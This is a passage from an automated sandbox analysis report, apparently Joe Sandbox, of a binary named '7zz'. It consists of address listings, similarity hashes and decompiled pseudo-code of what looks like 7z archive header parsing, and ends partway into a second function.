                                                                                  0x00448acd
                                                                                  0x00448ad1
                                                                                  0x00448ad5
                                                                                  0x00448ae0
                                                                                  0x00448ae4
                                                                                  0x00448ae6
                                                                                  0x00448ae8
                                                                                  0x00448aea
                                                                                  0x00448aee
                                                                                  0x00448af0
                                                                                  0x00448af7
                                                                                  0x00448af7
                                                                                  0x00448af9
                                                                                  0x00448afc
                                                                                  0x00448afe
                                                                                  0x00448aff
                                                                                  0x00448af7
                                                                                  0x00448b03
                                                                                  0x00448b03
                                                                                  0x00448b08
                                                                                  0x00448b21
                                                                                  0x00448b23
                                                                                  0x00448b23
                                                                                  0x00448b2a
                                                                                  0x00448b2e
                                                                                  0x00448b30
                                                                                  0x00448b32
                                                                                  0x00448b3c
                                                                                  0x00448b38
                                                                                  0x00448b38
                                                                                  0x00448b38
                                                                                  0x00448b41
                                                                                  0x00448b48
                                                                                  0x00448b49
                                                                                  0x00448b51
                                                                                  0x00448b57
                                                                                  0x00448b59
                                                                                  0x00448b61
                                                                                  0x00448b67
                                                                                  0x00448b6b
                                                                                  0x00448b6b
                                                                                  0x00448b75
                                                                                  0x00448b79
                                                                                  0x00448b81
                                                                                  0x00448b81
                                                                                  0x00448b85
                                                                                  0x00448b87
                                                                                  0x00448b8d
                                                                                  0x00448b8f
                                                                                  0x00448b91
                                                                                  0x00448b97
                                                                                  0x00448b9f
                                                                                  0x00448b9f
                                                                                  0x00448b9f
                                                                                  0x00448ba3
                                                                                  0x00448bab
                                                                                  0x00448baf
                                                                                  0x00448bb3
                                                                                  0x00448bb3
                                                                                  0x00448bb7
                                                                                  0x00448bb9
                                                                                  0x00448bbd
                                                                                  0x00448bbf
                                                                                  0x00448bc2
                                                                                  0x00448bc8
                                                                                  0x00448bcf
                                                                                  0x00448bd1
                                                                                  0x00448bd1
                                                                                  0x00448bd2
                                                                                  0x00448bd4
                                                                                  0x00448bd5
                                                                                  0x00448bd8
                                                                                  0x00448be3
                                                                                  0x00448be7
                                                                                  0x00448bef
                                                                                  0x00448bf7
                                                                                  0x00448bfa
                                                                                  0x00448bfa
                                                                                  0x00448bfc
                                                                                  0x00448bfe
                                                                                  0x00448c02
                                                                                  0x00448c06
                                                                                  0x00448c0c
                                                                                  0x00448c0e
                                                                                  0x00448c0f
                                                                                  0x00448c17
                                                                                  0x00448c21
                                                                                  0x00448c25
                                                                                  0x00448c25
                                                                                  0x00448c2f
                                                                                  0x00448c30
                                                                                  0x00448c38
                                                                                  0x00448c38
                                                                                  0x00448c3e
                                                                                  0x00448c5c
                                                                                  0x00448c63
                                                                                  0x00448c67
                                                                                  0x00448c6b
                                                                                  0x00448c6d
                                                                                  0x00448c71
                                                                                  0x00448c71
                                                                                  0x00448c73
                                                                                  0x00448c7d
                                                                                  0x00448c80
                                                                                  0x00448c80
                                                                                  0x00448c84
                                                                                  0x00448c8c
                                                                                  0x00448c94
                                                                                  0x00448c96
                                                                                  0x00448c99
                                                                                  0x00448c9f
                                                                                  0x00448c9f
                                                                                  0x00448ca1
                                                                                  0x00448ca3
                                                                                  0x00448ca6
                                                                                  0x00448ca8
                                                                                  0x00448ca8
                                                                                  0x00448cb2
                                                                                  0x00448cb3
                                                                                  0x00448cb6
                                                                                  0x00448cba
                                                                                  0x00448cbc
                                                                                  0x00448cc1
                                                                                  0x00448cca
                                                                                  0x00448cd3
                                                                                  0x00448cd4
                                                                                  0x00448cda
                                                                                  0x00448ce0
                                                                                  0x00448ce8
                                                                                  0x00448ce9
                                                                                  0x00448ce9
                                                                                  0x00448cf3
                                                                                  0x00448cf5
                                                                                  0x00448cf9
                                                                                  0x00448cfd
                                                                                  0x00448cfe
                                                                                  0x00448d02
                                                                                  0x00448d06
                                                                                  0x00448d08
                                                                                  0x00448d08
                                                                                  0x00448d0f
                                                                                  0x00448d13
                                                                                  0x00448d15
                                                                                  0x00448d19
                                                                                  0x00448d1e
                                                                                  0x00448d22
                                                                                  0x00448d23
                                                                                  0x00448d15
                                                                                  0x00448d2b
                                                                                  0x00448d32
                                                                                  0x00448d38
                                                                                  0x00448d3c
                                                                                  0x00448d3d
                                                                                  0x00448d45
                                                                                  0x00448d46
                                                                                  0x00448d4a
                                                                                  0x00448d4a
                                                                                  0x00448d53
                                                                                  0x00448d5b
                                                                                  0x00448d5f
                                                                                  0x00448d6b
                                                                                  0x00448d6e
                                                                                  0x00448d73
                                                                                  0x00448d75
                                                                                  0x00448d82
                                                                                  0x00448d88
                                                                                  0x00448d8f
                                                                                  0x00448da1
                                                                                  0x00448da6
                                                                                  0x00448d91
                                                                                  0x00448d95
                                                                                  0x00448d9a
                                                                                  0x00448d9a
                                                                                  0x00448da7
                                                                                  0x00448daf
                                                                                  0x00448db8
                                                                                  0x00448db9
                                                                                  0x00448dc9
                                                                                  0x00448dd2
                                                                                  0x00448dd6
                                                                                  0x00448dd6
                                                                                  0x00448dde
                                                                                  0x00448de2
                                                                                  0x00448de6
                                                                                  0x00448dea
                                                                                  0x00448df4
                                                                                  0x00448df8
                                                                                  0x00448df8
                                                                                  0x00448e02
                                                                                  0x00448e05
                                                                                  0x00448e0c
                                                                                  0x00448e10
                                                                                  0x00448e17
                                                                                  0x00448e1a
                                                                                  0x00448e1a
                                                                                  0x00448e1e
                                                                                  0x00448e24
                                                                                  0x00448e2c
                                                                                  0x00448e34
                                                                                  0x00448e43
                                                                                  0x00448e55
                                                                                  0x00448e55
                                                                                  0x00448e5e
                                                                                  0x00448e67
                                                                                  0x00448e6a
                                                                                  0x00448e72
                                                                                  0x00448e75
                                                                                  0x00448e77
                                                                                  0x00448e77
                                                                                  0x00448e7c
                                                                                  0x00448e7e
                                                                                  0x00448e7e
                                                                                  0x00448e83
                                                                                  0x00448e87
                                                                                  0x00448e8d
                                                                                  0x00448e92
                                                                                  0x00448e99
                                                                                  0x00448ea3
                                                                                  0x00448ea6
                                                                                  0x00448eab
                                                                                  0x00448ead
                                                                                  0x00448eb0
                                                                                  0x00448eb7
                                                                                  0x00448ebd
                                                                                  0x00448ec4
                                                                                  0x00448ec4
                                                                                  0x00448ec6
                                                                                  0x00448e77
                                                                                  0x00448ed2
                                                                                  0x00448eda
                                                                                  0x00448ee2
                                                                                  0x00448ee4
                                                                                  0x00448ee7
                                                                                  0x00448eef
                                                                                  0x00448f01
                                                                                  0x00448f05
                                                                                  0x00448f14
                                                                                  0x00448f14
                                                                                  0x00448f18
                                                                                  0x00448f1c
                                                                                  0x00448a25
                                                                                  0x00000000
                                                                                  0x00448a25
                                                                                  0x00448f07
                                                                                  0x00448f0a
                                                                                  0x00448f0c
                                                                                  0x00448f10
                                                                                  0x00000000
                                                                                  0x00448f10
                                                                                  0x00448f0a
                                                                                  0x00448f05
                                                                                  0x00448f2c
                                                                                  0x00448a65
                                                                                  0x00448a6b
                                                                                  0x00448a7d
                                                                                  0x00448a8f
                                                                                  0x00448aa1
                                                                                  0x00448aa3
                                                                                  0x00000000
                                                                                  0x00448a91
                                                                                  0x00448a91
                                                                                  0x00448a91
                                                                                  0x00448a7f
                                                                                  0x00448a7f
                                                                                  0x00448a7f
                                                                                  0x00448a6d
                                                                                  0x00448a6d
                                                                                  0x00448a6d
                                                                                  0x00000000
                                                                                  0x00448a6b

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: YA1
                                                                                  • API String ID: 0-613462611
                                                                                  • Opcode ID: 40c36dd2d9e12414e66adf71fdb657f7f3508d8c1f6a41737e3c26815d29bb3b
                                                                                  • Instruction ID: 099bcbc28d88e1846a75dfe823cd1f8e9a6e0cdfc63d5bc2b083594896ecf992
                                                                                  • Opcode Fuzzy Hash: 40c36dd2d9e12414e66adf71fdb657f7f3508d8c1f6a41737e3c26815d29bb3b
                                                                                  • Instruction Fuzzy Hash: DE42D2716083818FE715DF28C49066FBBE2BFD9308F14496EE8D59B342DA35D806CB86
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0042DBB6 Relevance: 1.7, APIs: 1, Instructions: 246COMMONCrypto
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 99%
                                                                                  			E0042DBB6(intOrPtr __ecx, signed int __edx) {
				signed int _t133;
				intOrPtr _t135;
				signed int _t136;
				signed int _t137;
				signed int _t148;
				intOrPtr _t159;
				signed int _t160;
				intOrPtr _t162;
				void* _t164;
				signed int _t167;
				intOrPtr _t175;
				signed int _t177;
				signed int _t183;
				intOrPtr _t184;
				intOrPtr _t185;
				intOrPtr _t201;
				signed int _t211;
				signed int _t214;
				signed int _t215;
				intOrPtr _t217;
				signed int _t218;
				void* _t219;
				void* _t220;
				void* _t221;
				signed int _t223;
				signed int _t225;
				void* _t226;

				_t211 = __edx;
				L0046B890(0x477530, _t226);
				_t175 = __ecx;
				 *((intOrPtr*)(_t226 - 0x14)) = __ecx;
				E0040862D();
				_t223 =  *(_t226 + 8);
				E0040867E( *((intOrPtr*)(_t226 + 0xc)),  *(_t223 + 8));
				while(1) {
					_t133 = E0042D1A5( *((intOrPtr*)(_t175 + 0x18)), _t211);
					_t183 = _t211;
					 *(_t226 - 0x1c) = _t133;
					 *(_t226 - 0x18) = _t183;
					if(_t133 != 0xd) {
						goto L6;
					}
					L2:
					_t211 = 0;
					if(_t183 != 0) {
						L7:
						__eflags = _t133 - 0xa;
						if(_t133 != 0xa) {
							L9:
							__eflags = _t133 - 9;
							if(_t133 != 9) {
								L11:
								__eflags = _t133 | _t183;
								if((_t133 | _t183) == 0) {
									L13:
									_t135 =  *((intOrPtr*)(_t226 + 0xc));
									__eflags =  *((intOrPtr*)(_t135 + 8)) - _t211;
									if( *((intOrPtr*)(_t135 + 8)) != _t211) {
										L17:
										_t184 =  *((intOrPtr*)(_t226 + 0xc));
										_t214 = 0;
										 *(_t226 - 0x10) = 0;
										__eflags =  *((intOrPtr*)(_t184 + 8)) - _t211;
										if( *((intOrPtr*)(_t184 + 8)) <= _t211) {
											L27:
											__eflags =  *(_t226 - 0x1c) - 9;
											if( *(_t226 - 0x1c) == 9) {
												__eflags =  *(_t226 - 0x18) - _t211;
												if( *(_t226 - 0x18) == _t211) {
													_t160 = E0042D1A5( *((intOrPtr*)(_t175 + 0x18)), _t211);
													_t184 =  *((intOrPtr*)(_t226 + 0xc));
													 *(_t226 - 0x18) = _t211;
													 *(_t226 - 0x1c) = _t160;
													_t211 = 0;
													__eflags = 0;
												}
											}
											_t215 =  *(_t223 + 8);
											 *(_t226 - 0x10) = _t211;
											__eflags = _t215 - _t211;
											 *(_t226 + 8) = _t211;
											if(_t215 <= _t211) {
												L37:
												_t136 =  *(_t226 - 0x1c);
												__eflags = _t136 - 0xa;
												if(_t136 != 0xa) {
													L48:
													_t137 = _t136 |  *(_t226 - 0x18);
													__eflags = _t137;
													if(_t137 == 0) {
														_t185 =  *((intOrPtr*)(_t226 + 0x14));
														__eflags =  *((intOrPtr*)(_t185 + 8)) - _t211;
														if( *((intOrPtr*)(_t185 + 8)) != _t211) {
															L54:
															 *[fs:0x0] =  *((intOrPtr*)(_t226 - 0xc));
															return _t137;
														}
														E0042CFAA(_t185,  *(_t226 + 8));
														_t137 = E0040862D();
														_t225 =  *(_t226 + 8);
														__eflags = _t225;
														if(_t225 <= 0) {
															goto L54;
														} else {
															goto L53;
														}
														do {
															L53:
															_t137 = E00415C6D( *((intOrPtr*)(_t226 + 0x18)), 0);
															_t225 = _t225 - 1;
															__eflags = _t225;
														} while (_t225 != 0);
														goto L54;
													}
													E0042D192( *((intOrPtr*)(_t175 + 0x18)), _t211);
													L50:
													 *(_t226 - 0x1c) = E0042D1A5( *((intOrPtr*)(_t175 + 0x18)), _t211);
													 *(_t226 - 0x18) = _t211;
													goto L36;
												}
												__eflags =  *(_t226 - 0x18) - _t211;
												if(__eflags != 0) {
													goto L48;
												}
												 *(_t226 - 0x48) = _t211;
												 *(_t226 - 0x44) = _t211;
												 *(_t226 - 0x40) = _t211;
												 *((intOrPtr*)(_t226 - 0x3c)) = 1;
												 *((intOrPtr*)(_t226 - 0x4c)) = 0x47ab08;
												 *(_t226 - 4) = _t211;
												 *(_t226 - 0x34) = _t211;
												 *(_t226 - 0x30) = _t211;
												 *(_t226 - 0x2c) = _t211;
												 *((intOrPtr*)(_t226 - 0x28)) = 4;
												 *((intOrPtr*)(_t226 - 0x38)) = 0x47ab80;
												 *(_t226 - 4) = 1;
												E0042D850(_t175, __eflags,  *(_t226 - 0x10), _t226 - 0x4c, _t226 - 0x38);
												_t177 = 0;
												__eflags =  *(_t223 + 8);
												 *(_t226 + 0x10) = 0;
												if( *(_t223 + 8) <= 0) {
													L47:
													 *(_t226 - 4) =  *(_t226 - 4) & 0x00000000;
													E00408604(_t226 - 0x38);
													 *(_t226 - 4) =  *(_t226 - 4) | 0xffffffff;
													E00408604(_t226 - 0x4c);
													_t175 =  *((intOrPtr*)(_t226 - 0x14));
													goto L50;
												} else {
													goto L40;
												}
												do {
													L40:
													_t217 =  *((intOrPtr*)( *((intOrPtr*)(_t223 + 0xc)) + _t177 * 4));
													_t148 =  *( *((intOrPtr*)( *((intOrPtr*)(_t226 + 0xc)) + 0xc)) + _t177 * 4);
													__eflags = _t148 - 1;
													if(_t148 != 1) {
														L43:
														__eflags = _t148;
														if(_t148 <= 0) {
															goto L46;
														}
														_t218 = _t148;
														do {
															L0043AC2F( *((intOrPtr*)(_t226 + 0x14)),  *((intOrPtr*)( *(_t226 - 0x40) +  *(_t226 + 0x10))));
															E00415C6D( *((intOrPtr*)(_t226 + 0x18)),  *((intOrPtr*)( *(_t226 - 0x2c) +  *(_t226 + 0x10) * 4)));
															 *(_t226 + 0x10) =  *(_t226 + 0x10) + 1;
															_t218 = _t218 - 1;
															__eflags = _t218;
														} while (_t218 != 0);
														goto L46;
													}
													__eflags =  *((char*)(_t217 + 0x54));
													if( *((char*)(_t217 + 0x54)) == 0) {
														goto L43;
													}
													L0043AC2F( *((intOrPtr*)(_t226 + 0x14)), _t148);
													E00415C6D( *((intOrPtr*)(_t226 + 0x18)),  *((intOrPtr*)(_t217 + 0x50)));
													L46:
													_t177 = _t177 + 1;
													__eflags = _t177 -  *(_t223 + 8);
												} while (_t177 <  *(_t223 + 8));
												goto L47;
											} else {
												 *(_t226 + 0x10) =  *(_t184 + 0xc);
												do {
													_t201 =  *((intOrPtr*)( *(_t226 + 0x10) + _t211 * 4));
													__eflags = _t201 - 1;
													if(_t201 != 1) {
														L34:
														_t64 = _t226 - 0x10;
														 *_t64 =  *(_t226 - 0x10) + _t201;
														__eflags =  *_t64;
														goto L35;
													}
													_t159 =  *((intOrPtr*)( *((intOrPtr*)(_t223 + 0xc)) + _t211 * 4));
													__eflags =  *((char*)(_t159 + 0x54));
													if( *((char*)(_t159 + 0x54)) != 0) {
														goto L35;
													}
													goto L34;
													L35:
													 *(_t226 + 8) =  *(_t226 + 8) + _t201;
													_t211 = _t211 + 1;
													__eflags = _t211 - _t215;
												} while (_t211 < _t215);
												L36:
												_t211 = 0;
												__eflags = 0;
												goto L37;
											}
										} else {
											goto L18;
										}
										do {
											L18:
											_t162 =  *((intOrPtr*)( *(_t184 + 0xc) + _t214 * 4));
											__eflags = _t162 - _t211;
											if(_t162 == _t211) {
												goto L26;
											}
											__eflags = _t162 - 1;
											 *(_t226 - 0x24) = _t211;
											 *(_t226 - 0x20) = _t211;
											if(_t162 <= 1) {
												L25:
												_t164 = E00429826( *((intOrPtr*)( *((intOrPtr*)(_t223 + 0xc)) + _t214 * 4)));
												asm("sbb edx, [ebp-0x20]");
												L0042389F( *(_t226 + 0x10), _t164 -  *(_t226 - 0x24), _t211);
												_t184 =  *((intOrPtr*)(_t226 + 0xc));
												_t211 = 0;
												__eflags = 0;
												goto L26;
											}
											_t167 = _t162 - 1;
											__eflags = _t167;
											 *(_t226 + 8) = _t167;
											do {
												__eflags =  *(_t226 - 0x1c) - 9;
												if( *(_t226 - 0x1c) == 9) {
													__eflags =  *(_t226 - 0x18) - _t211;
													if( *(_t226 - 0x18) == _t211) {
														_t219 = E0042D1A5( *((intOrPtr*)(_t175 + 0x18)), _t211);
														L0042389F( *(_t226 + 0x10), _t219, _t211);
														 *(_t226 - 0x24) =  *(_t226 - 0x24) + _t219;
														_t214 =  *(_t226 - 0x10);
														asm("adc [ebp-0x20], ebx");
														_t175 =  *((intOrPtr*)(_t226 - 0x14));
														_t211 = 0;
														__eflags = 0;
													}
												}
												_t36 = _t226 + 8;
												 *_t36 =  *(_t226 + 8) - 1;
												__eflags =  *_t36;
											} while ( *_t36 != 0);
											goto L25;
											L26:
											_t214 = _t214 + 1;
											__eflags = _t214 -  *((intOrPtr*)(_t184 + 8));
											 *(_t226 - 0x10) = _t214;
										} while (_t214 <  *((intOrPtr*)(_t184 + 8)));
										goto L27;
									}
									_t220 = 0;
									__eflags =  *(_t223 + 8) - _t211;
									if( *(_t223 + 8) <= _t211) {
										goto L17;
									} else {
										goto L15;
									}
									do {
										L15:
										E00415C6D( *((intOrPtr*)(_t226 + 0xc)), 1);
										_t220 = _t220 + 1;
										__eflags = _t220 -  *(_t223 + 8);
									} while (_t220 <  *(_t223 + 8));
									_t211 = 0;
									__eflags = 0;
									goto L17;
								}
								E0042D192( *((intOrPtr*)(_t175 + 0x18)), _t211);
								while(1) {
									_t133 = E0042D1A5( *((intOrPtr*)(_t175 + 0x18)), _t211);
									_t183 = _t211;
									 *(_t226 - 0x1c) = _t133;
									 *(_t226 - 0x18) = _t183;
									if(_t133 != 0xd) {
										goto L6;
									}
									goto L2;
								}
								goto L6;
							}
							__eflags = _t183 - _t211;
							if(_t183 == _t211) {
								goto L13;
							}
							goto L11;
						}
						__eflags = _t183 - _t211;
						if(_t183 == _t211) {
							goto L13;
						}
						goto L9;
					}
					_t221 = 0;
					if( *(_t223 + 8) <= 0) {
						continue;
					} else {
						goto L4;
					}
					do {
						L4:
						E00415C6D( *((intOrPtr*)(_t226 + 0xc)), E0042D241(0));
						_t221 = _t221 + 1;
					} while (_t221 <  *(_t223 + 8));
					continue;
					L6:
					_t211 = 0;
					__eflags = 0;
					goto L7;
				}
			}






























                                                                                  0x0042dbb6
                                                                                  0x0042dbbb
                                                                                  0x0042dbc4
                                                                                  0x0042dbcb
                                                                                  0x0042dbce
                                                                                  0x0042dbd3
                                                                                  0x0042dbdc
                                                                                  0x0042dbe1
                                                                                  0x0042dbe4
                                                                                  0x0042dbe9
                                                                                  0x0042dbee
                                                                                  0x0042dbf1
                                                                                  0x0042dbf4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042dbf6
                                                                                  0x0042dbf6
                                                                                  0x0042dbfa
                                                                                  0x0042dc1e
                                                                                  0x0042dc1e
                                                                                  0x0042dc21
                                                                                  0x0042dc27
                                                                                  0x0042dc27
                                                                                  0x0042dc2a
                                                                                  0x0042dc30
                                                                                  0x0042dc30
                                                                                  0x0042dc32
                                                                                  0x0042dc3e
                                                                                  0x0042dc3e
                                                                                  0x0042dc41
                                                                                  0x0042dc44
                                                                                  0x0042dc5f
                                                                                  0x0042dc5f
                                                                                  0x0042dc62
                                                                                  0x0042dc64
                                                                                  0x0042dc67
                                                                                  0x0042dc6a
                                                                                  0x0042dce2
                                                                                  0x0042dce2
                                                                                  0x0042dce6
                                                                                  0x0042dce8
                                                                                  0x0042dceb
                                                                                  0x0042dcf0
                                                                                  0x0042dcf5
                                                                                  0x0042dcf8
                                                                                  0x0042dcfb
                                                                                  0x0042dcfe
                                                                                  0x0042dcfe
                                                                                  0x0042dcfe
                                                                                  0x0042dceb
                                                                                  0x0042dd00
                                                                                  0x0042dd03
                                                                                  0x0042dd06
                                                                                  0x0042dd08
                                                                                  0x0042dd0b
                                                                                  0x0042dd37
                                                                                  0x0042dd37
                                                                                  0x0042dd3a
                                                                                  0x0042dd3d
                                                                                  0x0042de1f
                                                                                  0x0042de1f
                                                                                  0x0042de1f
                                                                                  0x0042de22
                                                                                  0x0042de3f
                                                                                  0x0042de42
                                                                                  0x0042de45
                                                                                  0x0042de6b
                                                                                  0x0042de71
                                                                                  0x0042de79
                                                                                  0x0042de79
                                                                                  0x0042de4a
                                                                                  0x0042de52
                                                                                  0x0042de57
                                                                                  0x0042de5a
                                                                                  0x0042de5c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042de5e
                                                                                  0x0042de5e
                                                                                  0x0042de63
                                                                                  0x0042de68
                                                                                  0x0042de68
                                                                                  0x0042de68
                                                                                  0x00000000
                                                                                  0x0042de5e
                                                                                  0x0042de27
                                                                                  0x0042de2c
                                                                                  0x0042de34
                                                                                  0x0042de37
                                                                                  0x00000000
                                                                                  0x0042de37
                                                                                  0x0042dd43
                                                                                  0x0042dd46
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042dd4c
                                                                                  0x0042dd4f
                                                                                  0x0042dd52
                                                                                  0x0042dd55
                                                                                  0x0042dd5c
                                                                                  0x0042dd63
                                                                                  0x0042dd66
                                                                                  0x0042dd69
                                                                                  0x0042dd6c
                                                                                  0x0042dd6f
                                                                                  0x0042dd76
                                                                                  0x0042dd87
                                                                                  0x0042dd8e
                                                                                  0x0042dd93
                                                                                  0x0042dd95
                                                                                  0x0042dd98
                                                                                  0x0042dd9b
                                                                                  0x0042de02
                                                                                  0x0042de02
                                                                                  0x0042de09
                                                                                  0x0042de0e
                                                                                  0x0042de15
                                                                                  0x0042de1a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042dd9d
                                                                                  0x0042dd9d
                                                                                  0x0042dda6
                                                                                  0x0042dda9
                                                                                  0x0042ddac
                                                                                  0x0042ddaf
                                                                                  0x0042ddcd
                                                                                  0x0042ddcd
                                                                                  0x0042ddcf
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042ddd1
                                                                                  0x0042ddd3
                                                                                  0x0042dde0
                                                                                  0x0042ddf1
                                                                                  0x0042ddf6
                                                                                  0x0042ddf9
                                                                                  0x0042ddf9
                                                                                  0x0042ddf9
                                                                                  0x00000000
                                                                                  0x0042ddd3
                                                                                  0x0042ddb1
                                                                                  0x0042ddb5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042ddbb
                                                                                  0x0042ddc6
                                                                                  0x0042ddfc
                                                                                  0x0042ddfc
                                                                                  0x0042ddfd
                                                                                  0x0042ddfd
                                                                                  0x00000000
                                                                                  0x0042dd0d
                                                                                  0x0042dd10
                                                                                  0x0042dd13
                                                                                  0x0042dd16
                                                                                  0x0042dd19
                                                                                  0x0042dd1c
                                                                                  0x0042dd2a
                                                                                  0x0042dd2a
                                                                                  0x0042dd2a
                                                                                  0x0042dd2a
                                                                                  0x00000000
                                                                                  0x0042dd2a
                                                                                  0x0042dd21
                                                                                  0x0042dd24
                                                                                  0x0042dd28
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042dd2d
                                                                                  0x0042dd2d
                                                                                  0x0042dd30
                                                                                  0x0042dd31
                                                                                  0x0042dd31
                                                                                  0x0042dd35
                                                                                  0x0042dd35
                                                                                  0x0042dd35
                                                                                  0x00000000
                                                                                  0x0042dd35
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042dc6c
                                                                                  0x0042dc6c
                                                                                  0x0042dc6f
                                                                                  0x0042dc72
                                                                                  0x0042dc74
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042dc76
                                                                                  0x0042dc79
                                                                                  0x0042dc7c
                                                                                  0x0042dc7f
                                                                                  0x0042dcb9
                                                                                  0x0042dcbf
                                                                                  0x0042dcca
                                                                                  0x0042dccf
                                                                                  0x0042dcd4
                                                                                  0x0042dcd7
                                                                                  0x0042dcd7
                                                                                  0x00000000
                                                                                  0x0042dcd7
                                                                                  0x0042dc81
                                                                                  0x0042dc81
                                                                                  0x0042dc82
                                                                                  0x0042dc85
                                                                                  0x0042dc85
                                                                                  0x0042dc89
                                                                                  0x0042dc8b
                                                                                  0x0042dc8e
                                                                                  0x0042dc9d
                                                                                  0x0042dca1
                                                                                  0x0042dca6
                                                                                  0x0042dca9
                                                                                  0x0042dcac
                                                                                  0x0042dcaf
                                                                                  0x0042dcb2
                                                                                  0x0042dcb2
                                                                                  0x0042dcb2
                                                                                  0x0042dc8e
                                                                                  0x0042dcb4
                                                                                  0x0042dcb4
                                                                                  0x0042dcb4
                                                                                  0x0042dcb4
                                                                                  0x00000000
                                                                                  0x0042dcd9
                                                                                  0x0042dcd9
                                                                                  0x0042dcda
                                                                                  0x0042dcdd
                                                                                  0x0042dcdd
                                                                                  0x00000000
                                                                                  0x0042dc6c
                                                                                  0x0042dc46
                                                                                  0x0042dc48
                                                                                  0x0042dc4b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042dc4d
                                                                                  0x0042dc4d
                                                                                  0x0042dc52
                                                                                  0x0042dc57
                                                                                  0x0042dc58
                                                                                  0x0042dc58
                                                                                  0x0042dc5d
                                                                                  0x0042dc5d
                                                                                  0x00000000
                                                                                  0x0042dc5d
                                                                                  0x0042dc37
                                                                                  0x0042dbe1
                                                                                  0x0042dbe4
                                                                                  0x0042dbe9
                                                                                  0x0042dbee
                                                                                  0x0042dbf1
                                                                                  0x0042dbf4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042dbf4
                                                                                  0x00000000
                                                                                  0x0042dbe1
                                                                                  0x0042dc2c
                                                                                  0x0042dc2e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042dc2e
                                                                                  0x0042dc23
                                                                                  0x0042dc25
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042dc25
                                                                                  0x0042dbfc
                                                                                  0x0042dc01
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042dc03
                                                                                  0x0042dc03
                                                                                  0x0042dc0f
                                                                                  0x0042dc14
                                                                                  0x0042dc15
                                                                                  0x00000000
                                                                                  0x0042dc1c
                                                                                  0x0042dc1c
                                                                                  0x0042dc1c
                                                                                  0x00000000
                                                                                  0x0042dc1c

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: 2efe874e0d54bcc63b88533e8d0e92cc829ab34bf8cfbc3d7771b8826d61e310
                                                                                  • Instruction ID: f0c02de7351495f9103b866f9f83217b28a37e7e00b398bfa100c8a62c2efe4d
                                                                                  • Opcode Fuzzy Hash: 2efe874e0d54bcc63b88533e8d0e92cc829ab34bf8cfbc3d7771b8826d61e310
                                                                                  • Instruction Fuzzy Hash: D2A14D70E006199FCB18DF56D8919AEB7B2FF94304F64842EE4159B351DB38AD81CB88
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00459170 Relevance: 1.6, Strings: 1, Instructions: 333COMMONCrypto
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 95%
                                                                                  			E00459170(void* __ecx, signed char* __edx) {
				void* _t195;
				signed int _t200;
				signed int _t201;
				intOrPtr _t202;
				signed int _t207;
				signed int _t210;
				signed int _t214;
				signed int* _t216;
				void* _t219;
				void* _t226;
